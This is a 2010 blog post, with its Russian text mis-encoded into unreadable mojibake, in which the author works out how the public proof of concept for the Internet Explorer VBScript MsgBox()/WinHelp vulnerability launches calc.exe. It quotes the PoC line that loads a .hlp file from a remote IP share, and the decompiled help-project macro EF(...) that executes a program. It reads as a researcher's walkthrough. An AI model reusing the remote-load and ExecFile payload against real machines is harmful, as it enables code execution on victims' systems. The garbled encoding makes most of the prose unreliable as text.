-ѕодписка по e-mail

 

 -ѕоиск по дневнику

ѕоиск сообщений в NeoliteBSD

 -—татистика

—татистика LiveInternet.ru: показано количество хитов и посетителей
—оздан: 25.07.2007
«аписей: 39
 омментариев: 25
Ќаписано: 106

”€звимость в VBScript функции MsgBox() в Microsoft Windows. ќт идеи до реализации.

—реда, 03 ћарта 2010 г. 10:06 + в цитатник
”тром коллега сообщил о новой у€звимости в IE св€занной с VBScript. Ќовость была с ’абра, поэтому сразу пошел смотреть подробности: http://habrahabr.ru/blogs/infosecurity/86069/ редиректит нас на http://focus.ua/tech/103699 где, в сущности, нет ничего конкретного по технической стороне вопроса, что было вполне предсказуемо. »дем на —екуЋаб и быстро находим нужное - http://www.securitylab.ru/news/391250.php. јга!
»сследователь Maurycy Prodeus опубликовал в п€тницу PoC код, демонстрирующий эксплуатацию у€звимости в VBScript функци€ MsgBox()
—мотрим ссылки по теме: http://www.securitylab.ru/vulnerability/391247.php, далее http://blogs.technet.com/msrc/archive/2010/02/28/i...d-internet-explorer-issue.aspx - не то, далее http://www.isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt - вот оно!
Proof-of-Concept is available here:

http://isec.pl/poc-isec27/
¬торой тест проходит успешно - winhlp32.exe крэшитс€ как надо, а вот с Calc.exe проблемы: big = "\\184.73.14.110\PUBLIC\test.hlp" не найден =\ Ќемного погуглив, находим http://www.exploit-db.com/exploits/11615 и архив с искомым файлом:
===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================
—качиваем, провер€ем - работает!  алькул€тор успешно запустилс€! Ќо как?.. Ќачинаем копать: недолгие поиски привели к софтине HelpScribble. ƒл€ декомпил€ции .hlp файла она посоветовала воспользоватьс€ декомпиллером. ќтлично!  ачаем, запускаем, распаковываем test.hlp. Ќа выходе два файла - test.rtf и test.hpj. ѕервый нам не нужен - он все равно пустой, а вот во втором мы находим искомое:
[OPTIONS]
LCID=0x409 0x0 0x0
COMPRESS=0

[CONFIG]
EF("C:\\WINDOWS\\calc.exe",`',1)

[FILES]
TEST.RTF

[MAP]
21KSYK4 1
≈ще немного поисков и находим нужное - http://www.stcsig.org/oi/hyperviews/resources/winhelp_faq/whfaq_qa.htm
...

[3.1.8] Can I link to a URL (web site) from a help file? How?

There are a number of DLLs available for launching a web browser and displaying a web page. The DLLs are good when users don't have a default browser specified. If your users are relatively up to date, you can get away with a simple macro:

ExecFile(`http://www.mysite.net/default.html',,0,)

will usually do the trick. Both Netscape and Microsoft browsers will set up the files needed to launch a URL from the command line. The ExecFile macro just takes advantage of this capability. (Hint: From the Start menu, select Run, and then enter a URL. Click OK, and your browser should launch directly to the page you specified.)

...

ѕодробнее по ссылке - http://help.adobe.com/en_US/RoboHelp/Rword/7.0/mer...ELP_ExecFile_WinHelp_macro.htm

Help Workshop automatically converts the ExecFile macro to EF.

¬от и все! =) Ќа все про все ушло не более получаса.

–убрики:  ’роники
»сследовани€
ћетки:  



arturchik   обратитьс€ по имени ¬торник, 01 январ€ 2013 г. 21:00 (ссылка)
Ѕлагодарю! ќт всей души поздравл€ю с наступившим Ќовым годом! ∆елаю,чтобы у вас было все,что вы хотите!
ќтветить — цитатой ¬ цитатник
 

ƒобавить комментарий:
“екст комментари€: смайлики

ѕроверка орфографии: (найти ошибки)

ѕрикрепить картинку:

 ѕереводить URL в ссылку
 ѕодписатьс€ на комментарии
 ѕодписать картинку